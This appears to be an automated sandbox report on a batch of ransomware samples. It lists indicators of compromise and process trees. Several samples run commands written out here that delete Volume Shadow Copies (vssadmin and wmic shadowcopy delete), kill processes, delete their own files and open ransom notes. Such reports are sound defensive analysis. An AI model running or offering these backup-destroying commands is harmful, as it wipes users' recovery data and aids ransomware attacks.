HEUR-Trojan-Ransom.Win32.Agent.gen-7d7daf7c3da5d32c47398050d5526a1bb0f70a8a00e372579adeef570cf838b6.exe 768 HEUR-Trojan-Ransom.Win32.Agent.gen-7d7daf7c3da5d32c47398050d5526a1bb0f70a8a00e372579adeef570cf838b6.exe 768 HEUR-Trojan-Ransom.Win32.Agent.gen-7d7daf7c3da5d32c47398050d5526a1bb0f70a8a00e372579adeef570cf838b6.exe 768 HEUR-Trojan-Ransom.Win32.Agent.gen-7d7daf7c3da5d32c47398050d5526a1bb0f70a8a00e372579adeef570cf838b6.exe 768 HEUR-Trojan-Ransom.Win32.Agent.gen-7d7daf7c3da5d32c47398050d5526a1bb0f70a8a00e372579adeef570cf838b6.exe 768 HEUR-Trojan-Ransom.Win32.Agent.gen-7d7daf7c3da5d32c47398050d5526a1bb0f70a8a00e372579adeef570cf838b6.exe 768 HEUR-Trojan-Ransom.Win32.Agent.gen-7d7daf7c3da5d32c47398050d5526a1bb0f70a8a00e372579adeef570cf838b6.exe 768 HEUR-Trojan-Ransom.Win32.Agent.gen-7d7daf7c3da5d32c47398050d5526a1bb0f70a8a00e372579adeef570cf838b6.exe 768 HEUR-Trojan-Ransom.Win32.Agent.gen-7d7daf7c3da5d32c47398050d5526a1bb0f70a8a00e372579adeef570cf838b6.exe 768 HEUR-Trojan-Ransom.Win32.Agent.gen-7d7daf7c3da5d32c47398050d5526a1bb0f70a8a00e372579adeef570cf838b6.exe 768 HEUR-Trojan-Ransom.Win32.Agent.gen-7d7daf7c3da5d32c47398050d5526a1bb0f70a8a00e372579adeef570cf838b6.exe 768 HEUR-Trojan-Ransom.Win32.Agent.gen-7d7daf7c3da5d32c47398050d5526a1bb0f70a8a00e372579adeef570cf838b6.exe 768 HEUR-Trojan-Ransom.Win32.Agent.gen-7d7daf7c3da5d32c47398050d5526a1bb0f70a8a00e372579adeef570cf838b6.exe 768 HEUR-Trojan-Ransom.Win32.Agent.gen-7d7daf7c3da5d32c47398050d5526a1bb0f70a8a00e372579adeef570cf838b6.exe 768 HEUR-Trojan-Ransom.Win32.Agent.gen-7d7daf7c3da5d32c47398050d5526a1bb0f70a8a00e372579adeef570cf838b6.exe 768 HEUR-Trojan-Ransom.Win32.Agent.gen-7d7daf7c3da5d32c47398050d5526a1bb0f70a8a00e372579adeef570cf838b6.exe 768 HEUR-Trojan-Ransom.Win32.Agent.gen-7d7daf7c3da5d32c47398050d5526a1bb0f70a8a00e372579adeef570cf838b6.exe 768 HEUR-Trojan-Ransom.Win32.Agent.gen-7d7daf7c3da5d32c47398050d5526a1bb0f70a8a00e372579adeef570cf838b6.exe 768 HEUR-Trojan-Ransom.Win32.Agent.gen-7d7daf7c3da5d32c47398050d5526a1bb0f70a8a00e372579adeef570cf838b6.exe -
Suspicious behavior: MapViewOfSection 4 IoCs
pid Process 2320 HEUR-Trojan-Ransom.Win32.Agent.gen-7d7daf7c3da5d32c47398050d5526a1bb0f70a8a00e372579adeef570cf838b6.exe 2084 Trojan-Ransom.Win32.Foreign.hakl-dcea875063bdf43a0cc40540834a1b24884eb054db00cd208d2603951367bbd9.exe 2084 Trojan-Ransom.Win32.Foreign.hakl-dcea875063bdf43a0cc40540834a1b24884eb054db00cd208d2603951367bbd9.exe 2344 Trojan-Ransom.Win32.Zerber.tcx-b7543fbeff4309b9bd6ba8634a3f025ed81774e020b756ad6b2a8919393b7e4f.exe -
Suspicious use of AdjustPrivilegeToken 13 IoCs
description pid Process Token: SeRestorePrivilege 2668 7zFM.exe Token: 35 2668 7zFM.exe Token: SeSecurityPrivilege 2668 7zFM.exe Token: SeDebugPrivilege 2392 taskmgr.exe Token: SeShutdownPrivilege 1784 Trojan-Ransom.Win32.Shade.nut-9c791da16db11c31b710f671faf319ce85252b4babc42d8af58c3c89d7dc5f80.exe Token: SeShutdownPrivilege 1784 Trojan-Ransom.Win32.Shade.nut-9c791da16db11c31b710f671faf319ce85252b4babc42d8af58c3c89d7dc5f80.exe Token: SeShutdownPrivilege 1784 Trojan-Ransom.Win32.Shade.nut-9c791da16db11c31b710f671faf319ce85252b4babc42d8af58c3c89d7dc5f80.exe Token: SeShutdownPrivilege 1784 Trojan-Ransom.Win32.Shade.nut-9c791da16db11c31b710f671faf319ce85252b4babc42d8af58c3c89d7dc5f80.exe Token: SeDebugPrivilege 2684 Trojan-Ransom.Win32.Blocker.kbjb-dcc099d04a77cb1cc9dbab42b65f4c39e81ba1c2ba3f8f93bf26172b1fa60a1e.exe Token: SeDebugPrivilege 768 HEUR-Trojan-Ransom.Win32.Agent.gen-7d7daf7c3da5d32c47398050d5526a1bb0f70a8a00e372579adeef570cf838b6.exe Token: SeBackupPrivilege 9680 vssvc.exe Token: SeRestorePrivilege 9680 vssvc.exe Token: SeAuditPrivilege 9680 vssvc.exe -
Suspicious use of FindShellTrayWindow 52 IoCs
pid Process 2668 7zFM.exe 2668 7zFM.exe 2392 taskmgr.exe 2392 taskmgr.exe 2392 taskmgr.exe 2392 taskmgr.exe 2392 taskmgr.exe 2392 taskmgr.exe 2392 taskmgr.exe 2392 taskmgr.exe 2392 taskmgr.exe 2392 taskmgr.exe 2392 taskmgr.exe 2392 taskmgr.exe 2392 taskmgr.exe 2392 taskmgr.exe 2392 taskmgr.exe 2392 taskmgr.exe 2392 taskmgr.exe 2392 taskmgr.exe 2392 taskmgr.exe 2392 taskmgr.exe 2392 taskmgr.exe 2392 taskmgr.exe 2392 taskmgr.exe 2392 taskmgr.exe 2392 taskmgr.exe 2392 taskmgr.exe 2392 taskmgr.exe 2392 taskmgr.exe 2392 taskmgr.exe 2392 taskmgr.exe 2392 taskmgr.exe 2392 taskmgr.exe 2392 taskmgr.exe 2392 taskmgr.exe 2392 taskmgr.exe 2392 taskmgr.exe 2392 taskmgr.exe 2392 taskmgr.exe 2392 taskmgr.exe 2392 taskmgr.exe 2392 taskmgr.exe 2392 taskmgr.exe 2392 taskmgr.exe 2392 taskmgr.exe 2392 taskmgr.exe 2392 taskmgr.exe 2392 taskmgr.exe 2392 taskmgr.exe 2392 taskmgr.exe 2392 taskmgr.exe -
Suspicious use of SendNotifyMessage 49 IoCs
pid Process 2392 taskmgr.exe 2392 taskmgr.exe 2392 taskmgr.exe 2392 taskmgr.exe 2392 taskmgr.exe 2392 taskmgr.exe 2392 taskmgr.exe 2392 taskmgr.exe 2392 taskmgr.exe 2392 taskmgr.exe 2392 taskmgr.exe 2392 taskmgr.exe 2392 taskmgr.exe 2392 taskmgr.exe 2392 taskmgr.exe 2392 taskmgr.exe 2392 taskmgr.exe 2392 taskmgr.exe 2392 taskmgr.exe 2392 taskmgr.exe 2392 taskmgr.exe 2392 taskmgr.exe 2392 taskmgr.exe 2392 taskmgr.exe 2392 taskmgr.exe 2392 taskmgr.exe 2392 taskmgr.exe 2392 taskmgr.exe 2392 taskmgr.exe 2392 taskmgr.exe 2392 taskmgr.exe 2392 taskmgr.exe 2392 taskmgr.exe 2392 taskmgr.exe 2392 taskmgr.exe 2392 taskmgr.exe 2392 taskmgr.exe 2392 taskmgr.exe 2392 taskmgr.exe 2392 taskmgr.exe 2392 taskmgr.exe 2392 taskmgr.exe 2392 taskmgr.exe 2392 taskmgr.exe 2392 taskmgr.exe 2392 taskmgr.exe 2392 taskmgr.exe 2392 taskmgr.exe 2392 taskmgr.exe -
Suspicious use of SetWindowsHookEx 11 IoCs
pid Process 1028 HEUR-Trojan-Ransom.Win32.Generic-813d8b034d368395057497d0bbb354f08820d60f169a2e4c9e72fff0a196f77e.exe 1028 HEUR-Trojan-Ransom.Win32.Generic-813d8b034d368395057497d0bbb354f08820d60f169a2e4c9e72fff0a196f77e.exe 1028 HEUR-Trojan-Ransom.Win32.Generic-813d8b034d368395057497d0bbb354f08820d60f169a2e4c9e72fff0a196f77e.exe 1840 Trojan-Ransom.Win32.Bitman.ldt-1988cea6a6c5728b5e4d57233c38fea6990d01b526ff82b165345577c26f944e.exe 2792 Trojan-Ransom.Win32.Bitman.nws-53e3be423c8db2ffd11204e394292125660372f5c6de75e55073b4177a4ce486.exe 972 Trojan-Ransom.Win32.Blocker.kkgx-eed7e32651cc0078bcdd7a16a238caa067c04a1055d7164a9979fa4f94dd651c.exe 2156 Trojan-Ransom.Win32.Cryptoff.ad-51995b0633166bba73dfb121f0e8bf307b9b83d72b9c2391b6c2cca9f788e90c.exe 1380 Trojan-Ransom.Win32.Shade.uv-c175adddb330f7f3ce7ada3547ba75f5d2c9ae1fc5a31280901479ce68e787b3.exe 972 Trojan-Ransom.Win32.Blocker.kkgx-eed7e32651cc0078bcdd7a16a238caa067c04a1055d7164a9979fa4f94dd651c.exe 972 Trojan-Ransom.Win32.Blocker.kkgx-eed7e32651cc0078bcdd7a16a238caa067c04a1055d7164a9979fa4f94dd651c.exe 1492 HEUR-Trojan-Ransom.Win32.Generic-813d8b034d368395057497d0bbb354f08820d60f169a2e4c9e72fff0a196f77e.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1808 wrote to memory of 2320 1808 cmd.exe 36 PID 1808 wrote to memory of 2320 1808 cmd.exe 36 PID 1808 wrote to memory of 2320 1808 cmd.exe 36 PID 1808 wrote to memory of 2320 1808 cmd.exe 36 PID 1808 wrote to memory of 2320 1808 cmd.exe 36 PID 1808 wrote to memory of 2320 1808 cmd.exe 36 PID 1808 wrote to memory of 2320 1808 cmd.exe 36 PID 1808 wrote to memory of 1164 1808 cmd.exe 37 PID 1808 wrote to memory of 1164 1808 cmd.exe 37 PID 1808 wrote to memory of 1164 1808 cmd.exe 37 PID 1808 wrote to memory of 1164 1808 cmd.exe 37 PID 1808 wrote to memory of 1708 1808 cmd.exe 38 PID 1808 wrote to memory of 1708 1808 cmd.exe 38 PID 1808 wrote to memory of 1708 1808 cmd.exe 38 PID 1808 wrote to memory of 1708 1808 cmd.exe 38 PID 1808 wrote to memory of 1028 1808 cmd.exe 39 PID 1808 wrote to memory of 1028 1808 cmd.exe 39 PID 1808 wrote to memory of 1028 1808 cmd.exe 39 PID 1808 wrote to memory of 1028 1808 cmd.exe 39 PID 1808 wrote to memory of 1884 1808 cmd.exe 40 PID 1808 wrote to memory of 1884 1808 cmd.exe 40 PID 1808 wrote to memory of 1884 1808 cmd.exe 40 PID 1808 wrote to memory of 1884 1808 cmd.exe 40 PID 1808 wrote to memory of 1644 1808 cmd.exe 41 PID 1808 wrote to memory of 1644 1808 cmd.exe 41 PID 1808 wrote to memory of 1644 1808 cmd.exe 41 PID 1808 wrote to memory of 1644 1808 cmd.exe 41 PID 1808 wrote to memory of 1840 1808 cmd.exe 42 PID 1808 wrote to memory of 1840 1808 cmd.exe 42 PID 1808 wrote to memory of 1840 1808 cmd.exe 42 PID 1808 wrote to memory of 1840 1808 cmd.exe 42 PID 1808 wrote to memory of 2940 1808 cmd.exe 43 PID 1808 wrote to memory of 2940 1808 cmd.exe 43 PID 1808 wrote to memory of 2940 1808 cmd.exe 43 PID 1808 wrote to memory of 2940 1808 cmd.exe 43 PID 1808 wrote to memory of 2792 1808 cmd.exe 44 PID 1808 wrote to memory of 2792 1808 cmd.exe 44 PID 1808 wrote to memory of 2792 1808 cmd.exe 44 PID 1808 wrote to memory of 2792 1808 cmd.exe 44 PID 1808 wrote to memory of 2804 1808 cmd.exe 45 PID 1808 wrote to memory of 2804 1808 cmd.exe 45 PID 1808 wrote to memory of 2804 1808 cmd.exe 45 PID 1808 wrote to memory of 2804 1808 cmd.exe 45 PID 1808 wrote to memory of 2684 1808 cmd.exe 46 PID 1808 wrote to memory of 2684 1808 cmd.exe 46 PID 1808 wrote to memory of 2684 1808 cmd.exe 46 PID 1808 wrote to memory of 2684 1808 cmd.exe 46 PID 1808 wrote to memory of 2192 1808 cmd.exe 47 PID 1808 wrote to memory of 2192 1808 cmd.exe 47 PID 1808 wrote to memory of 2192 1808 cmd.exe 47 PID 1808 wrote to memory of 2192 1808 cmd.exe 47 PID 1808 wrote to memory of 972 1808 cmd.exe 48 PID 1808 wrote to memory of 972 1808 cmd.exe 48 PID 1808 wrote to memory of 972 1808 cmd.exe 48 PID 1808 wrote to memory of 972 1808 cmd.exe 48 PID 1808 wrote to memory of 3036 1808 cmd.exe 49 PID 1808 wrote to memory of 3036 1808 cmd.exe 49 PID 1808 wrote to memory of 3036 1808 cmd.exe 49 PID 1808 wrote to memory of 3036 1808 cmd.exe 49 PID 1808 wrote to memory of 2156 1808 cmd.exe 50 PID 1808 wrote to memory of 2156 1808 cmd.exe 50 PID 1808 wrote to memory of 2156 1808 cmd.exe 50 PID 1808 wrote to memory of 2156 1808 cmd.exe 50 PID 1808 wrote to memory of 2084 1808 cmd.exe 51 -
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
-
Views/modifies file attributes 1 TTPs 2 IoCs
pid Process 11212 attrib.exe 4564 attrib.exe
Processes
-
C:\Program Files\7-Zip\7zFM.exe"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\RNSM00294.7z"1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:2668
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:1808 -
C:\Users\Admin\Desktop\00294\HEUR-Trojan-Ransom.Win32.Agent.gen-7d7daf7c3da5d32c47398050d5526a1bb0f70a8a00e372579adeef570cf838b6.exeHEUR-Trojan-Ransom.Win32.Agent.gen-7d7daf7c3da5d32c47398050d5526a1bb0f70a8a00e372579adeef570cf838b6.exe2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious behavior: MapViewOfSection
PID:2320 -
C:\Users\Admin\Desktop\00294\HEUR-Trojan-Ransom.Win32.Agent.gen-7d7daf7c3da5d32c47398050d5526a1bb0f70a8a00e372579adeef570cf838b6.exeHEUR-Trojan-Ransom.Win32.Agent.gen-7d7daf7c3da5d32c47398050d5526a1bb0f70a8a00e372579adeef570cf838b6.exe3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:768 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe"4⤵PID:3360
-
C:\Windows\system32\wbem\WMIC.exeC:\Windows\system32\wbem\wmic.exe shadowcopy delete5⤵PID:7552
-
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\_README_.hta"4⤵PID:5164
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe"4⤵PID:5196
-
C:\Users\Admin\AppData\Roaming\{03DCD65C-9679-444D-F105-BB6BAC813AA4}\mfpmp.exe"C:\Users\Admin\AppData\Roaming\{03DCD65C-9679-444D-F105-BB6BAC813AA4}\mfpmp.exe"5⤵PID:5148
-
-
C:\Windows\system32\taskkill.exetaskkill /f /im "HEUR-Trojan-Ransom.Win32.Agent.gen-7d7daf7c3da5d32c47398050d5526a1bb0f70a8a00e372579adeef570cf838b6.exe"5⤵
- Kills process with taskkill
PID:2736
-
-
C:\Windows\system32\PING.EXEping -n 1 127.0.0.15⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:5444
-
-
-
-
-
C:\Users\Admin\Desktop\00294\HEUR-Trojan-Ransom.Win32.Generic-1a7d64c5aaf3194a16c07caa8fba7c4862c4d32b315f1d116b753830152e1392.exeHEUR-Trojan-Ransom.Win32.Generic-1a7d64c5aaf3194a16c07caa8fba7c4862c4d32b315f1d116b753830152e1392.exe2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:1164
-
-
C:\Users\Admin\Desktop\00294\HEUR-Trojan-Ransom.Win32.Generic-6ff32a4efb2f282a9f22bb994872d6435050bf2d6bd480af2e63ec8cf6a4b0ef.exeHEUR-Trojan-Ransom.Win32.Generic-6ff32a4efb2f282a9f22bb994872d6435050bf2d6bd480af2e63ec8cf6a4b0ef.exe2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:1708
-
-
C:\Users\Admin\Desktop\00294\HEUR-Trojan-Ransom.Win32.Generic-813d8b034d368395057497d0bbb354f08820d60f169a2e4c9e72fff0a196f77e.exeHEUR-Trojan-Ransom.Win32.Generic-813d8b034d368395057497d0bbb354f08820d60f169a2e4c9e72fff0a196f77e.exe2⤵
- Drops startup file
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious use of SetWindowsHookEx
PID:1028 -
C:\Users\Admin\AppData\Roaming\HEUR-Trojan-Ransom.Win32.Generic-813d8b034d368395057497d0bbb354f08820d60f169a2e4c9e72fff0a196f77e.exeC:\Users\Admin\AppData\Roaming\HEUR-Trojan-Ransom.Win32.Generic-813d8b034d368395057497d0bbb354f08820d60f169a2e4c9e72fff0a196f77e.exe3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:1492
-
-
-
C:\Users\Admin\Desktop\00294\HEUR-Trojan-Ransom.Win32.Generic-8a42a9df4c3c4a37a8e88102be0d701c704ec1d91732e5888af57038da4eb944.exeHEUR-Trojan-Ransom.Win32.Generic-8a42a9df4c3c4a37a8e88102be0d701c704ec1d91732e5888af57038da4eb944.exe2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:1884
-
-
C:\Users\Admin\Desktop\00294\HEUR-Trojan-Ransom.Win32.Zerber.pef-1a01faa2b4305c864972ad1cd98bdef35551430028ff9ab6d372f5a1aecbacb2.exeHEUR-Trojan-Ransom.Win32.Zerber.pef-1a01faa2b4305c864972ad1cd98bdef35551430028ff9ab6d372f5a1aecbacb2.exe2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:1644
-
-
C:\Users\Admin\Desktop\00294\Trojan-Ransom.Win32.Bitman.ldt-1988cea6a6c5728b5e4d57233c38fea6990d01b526ff82b165345577c26f944e.exeTrojan-Ransom.Win32.Bitman.ldt-1988cea6a6c5728b5e4d57233c38fea6990d01b526ff82b165345577c26f944e.exe2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious use of SetWindowsHookEx
PID:1840 -
C:\Users\Admin\Desktop\00294\Trojan-Ransom.Win32.Bitman.ldt-1988cea6a6c5728b5e4d57233c38fea6990d01b526ff82b165345577c26f944e.exeTrojan-Ransom.Win32.Bitman.ldt-1988cea6a6c5728b5e4d57233c38fea6990d01b526ff82b165345577c26f944e.exe3⤵PID:3292
-
C:\Windows\iklnufvpahgf.exeC:\Windows\iklnufvpahgf.exe4⤵PID:3376
-
C:\Windows\iklnufvpahgf.exeC:\Windows\iklnufvpahgf.exe5⤵PID:8160
-
C:\Windows\System32\wbem\WMIC.exe"C:\Windows\System32\wbem\WMIC.exe" shadowcopy delete /nointeractive6⤵PID:7972
-
-
C:\Windows\SysWOW64\NOTEPAD.EXE"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\RECOVERY.TXT6⤵
- Opens file in notepad (likely ransom note)
PID:9200
-
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\Admin\Desktop\RECOVERY.HTM6⤵PID:12864
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:12864 CREDAT:275457 /prefetch:27⤵PID:13264
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c DEL C:\Windows\IKLNUF~1.EXE6⤵PID:4732
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c DEL C:\Users\Admin\Desktop\00294\TROJAN~1.EXE4⤵PID:6504
-
-
-
-
C:\Users\Admin\Desktop\00294\Trojan-Ransom.Win32.Bitman.nhn-885c6d05dc20296697a214fdaacebdbced02598987d9184889f2a14a9280cd7f.exeTrojan-Ransom.Win32.Bitman.nhn-885c6d05dc20296697a214fdaacebdbced02598987d9184889f2a14a9280cd7f.exe2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:2940 -
C:\Users\Admin\Desktop\00294\Trojan-Ransom.Win32.Bitman.nhn-885c6d05dc20296697a214fdaacebdbced02598987d9184889f2a14a9280cd7f.exeTrojan-Ransom.Win32.Bitman.nhn-885c6d05dc20296697a214fdaacebdbced02598987d9184889f2a14a9280cd7f.exe3⤵PID:11112
-
C:\Windows\bukowlvvamey.exeC:\Windows\bukowlvvamey.exe4⤵PID:6784
-
C:\Windows\bukowlvvamey.exeC:\Windows\bukowlvvamey.exe5⤵PID:12408
-
C:\Windows\System32\wbem\WMIC.exe"C:\Windows\System32\wbem\WMIC.exe" shadowcopy delete /nointeractive6⤵PID:14656
-
-
C:\Windows\SysWOW64\NOTEPAD.EXE"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\RECOVERY.TXT6⤵
- Opens file in notepad (likely ransom note)
PID:5908
-
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\Admin\Desktop\RECOVERY.HTM6⤵PID:636
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:636 CREDAT:275457 /prefetch:27⤵PID:6908
-
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:636 CREDAT:1848321 /prefetch:27⤵PID:6704
-
-
-
C:\Windows\System32\wbem\WMIC.exe"C:\Windows\System32\wbem\WMIC.exe" shadowcopy delete /nointeractive6⤵PID:11876
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c DEL C:\Windows\BUKOWL~1.EXE6⤵PID:13172
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c DEL C:\Users\Admin\Desktop\00294\TROJAN~2.EXE4⤵PID:2176
-
-
-
-
C:\Users\Admin\Desktop\00294\Trojan-Ransom.Win32.Bitman.nws-53e3be423c8db2ffd11204e394292125660372f5c6de75e55073b4177a4ce486.exeTrojan-Ransom.Win32.Bitman.nws-53e3be423c8db2ffd11204e394292125660372f5c6de75e55073b4177a4ce486.exe2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious use of SetWindowsHookEx
PID:2792 -
C:\Users\Admin\Desktop\00294\Trojan-Ransom.Win32.Bitman.nws-53e3be423c8db2ffd11204e394292125660372f5c6de75e55073b4177a4ce486.exeTrojan-Ransom.Win32.Bitman.nws-53e3be423c8db2ffd11204e394292125660372f5c6de75e55073b4177a4ce486.exe3⤵PID:3324
-
C:\Windows\bpgkobjgvmda.exeC:\Windows\bpgkobjgvmda.exe4⤵PID:12152
-
C:\Windows\bpgkobjgvmda.exeC:\Windows\bpgkobjgvmda.exe5⤵PID:7596
-
C:\Users\Admin\Documents\qidxf.exeC:\Users\Admin\Documents\qidxf.exe6⤵PID:7108
-
C:\Windows\System32\vssadmin.exe"C:\Windows\System32\vssadmin.exe" delete shadows /all /Quiet7⤵
- Interacts with shadow copies
PID:4836
-
-
-
C:\Windows\SysWOW64\NOTEPAD.EXE"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\RECOVERY.TXT6⤵
- Opens file in notepad (likely ransom note)
PID:12776
-
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\Admin\Desktop\RECOVERY.HTM6⤵PID:12788
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:12788 CREDAT:275457 /prefetch:27⤵PID:13284
-
-
-
C:\Users\Admin\Documents\sfhjv.exeC:\Users\Admin\Documents\sfhjv.exe6⤵PID:1904
-
C:\Windows\System32\vssadmin.exe"C:\Windows\System32\vssadmin.exe" delete shadows /all /Quiet7⤵
- Interacts with shadow copies
PID:4380
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c DEL C:\Windows\BPGKOB~1.EXE6⤵PID:3708
-
C:\Users\Admin\AppData\Roaming\{03DCD65C-9679-444D-F105-BB6BAC813AA4}\mfpmp.exe"C:\Users\Admin\AppData\Roaming\{03DCD65C-9679-444D-F105-BB6BAC813AA4}\mfpmp.exe"7⤵PID:8264
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c DEL C:\Users\Admin\Desktop\00294\TROJAN~3.EXE4⤵PID:12040
-
-
-
-
C:\Users\Admin\Desktop\00294\Trojan-Ransom.Win32.Blocker.jzoj-aedcadc2caa44191506fee9254e868171078979ed3bc8283c7c825b47431c804.exeTrojan-Ransom.Win32.Blocker.jzoj-aedcadc2caa44191506fee9254e868171078979ed3bc8283c7c825b47431c804.exe2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:2804
-
-
C:\Users\Admin\Desktop\00294\Trojan-Ransom.Win32.Blocker.kbjb-dcc099d04a77cb1cc9dbab42b65f4c39e81ba1c2ba3f8f93bf26172b1fa60a1e.exeTrojan-Ransom.Win32.Blocker.kbjb-dcc099d04a77cb1cc9dbab42b65f4c39e81ba1c2ba3f8f93bf26172b1fa60a1e.exe2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious use of AdjustPrivilegeToken
PID:2684 -
C:\Users\Admin\Desktop\00294\Trojan-Ransom.Win32.Blocker.kbjb-dcc099d04a77cb1cc9dbab42b65f4c39e81ba1c2ba3f8f93bf26172b1fa60a1e.exe"C:\Users\Admin\Desktop\00294\Trojan-Ransom.Win32.Blocker.kbjb-dcc099d04a77cb1cc9dbab42b65f4c39e81ba1c2ba3f8f93bf26172b1fa60a1e.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:3388
-
-
-
C:\Users\Admin\Desktop\00294\Trojan-Ransom.Win32.Blocker.kcwh-89d52e28395a18b9ea9f725c9088ff995ea9a6f87c3b932bbed6b7358967b745.exeTrojan-Ransom.Win32.Blocker.kcwh-89d52e28395a18b9ea9f725c9088ff995ea9a6f87c3b932bbed6b7358967b745.exe2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:2192
-
-
C:\Users\Admin\Desktop\00294\Trojan-Ransom.Win32.Blocker.kkgx-eed7e32651cc0078bcdd7a16a238caa067c04a1055d7164a9979fa4f94dd651c.exeTrojan-Ransom.Win32.Blocker.kkgx-eed7e32651cc0078bcdd7a16a238caa067c04a1055d7164a9979fa4f94dd651c.exe2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious use of SetWindowsHookEx
PID:972 -
C:\Users\Admin\AppData\Roaming\Trojan-Ransom.Win32.Blocker.kkgx-eed7e32651cc0078bcdd7a16a238caa067c04a1055d7164a9979fa4f94dd651c.exeC:\Users\Admin\AppData\Roaming\Trojan-Ransom.Win32.Blocker.kkgx-eed7e32651cc0078bcdd7a16a238caa067c04a1055d7164a9979fa4f94dd651c.exe3⤵PID:14144
-
-
-
C:\Users\Admin\Desktop\00294\Trojan-Ransom.Win32.Blocker.maok-c7edfb86e2e9b1770a96810c1a4d85224ce47a8cdb0349bd88aba7c347a55f61.exeTrojan-Ransom.Win32.Blocker.maok-c7edfb86e2e9b1770a96810c1a4d85224ce47a8cdb0349bd88aba7c347a55f61.exe2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:3036
-
-
C:\Users\Admin\Desktop\00294\Trojan-Ransom.Win32.Cryptoff.ad-51995b0633166bba73dfb121f0e8bf307b9b83d72b9c2391b6c2cca9f788e90c.exeTrojan-Ransom.Win32.Cryptoff.ad-51995b0633166bba73dfb121f0e8bf307b9b83d72b9c2391b6c2cca9f788e90c.exe2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious use of SetWindowsHookEx
PID:2156 -
C:\Users\Admin\Desktop\00294\Trojan-Ransom.Win32.Cryptoff.ad-51995b0633166bba73dfb121f0e8bf307b9b83d72b9c2391b6c2cca9f788e90c.exe"C:\Users\Admin\Desktop\00294\Trojan-Ransom.Win32.Cryptoff.ad-51995b0633166bba73dfb121f0e8bf307b9b83d72b9c2391b6c2cca9f788e90c.exe"3⤵PID:5308
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c "vssadmin.exe delete shadows /all /quiet"4⤵PID:6108
-
C:\Windows\SysWOW64\vssadmin.exevssadmin.exe delete shadows /all /quiet5⤵
- Interacts with shadow copies
PID:12780
-
-
-
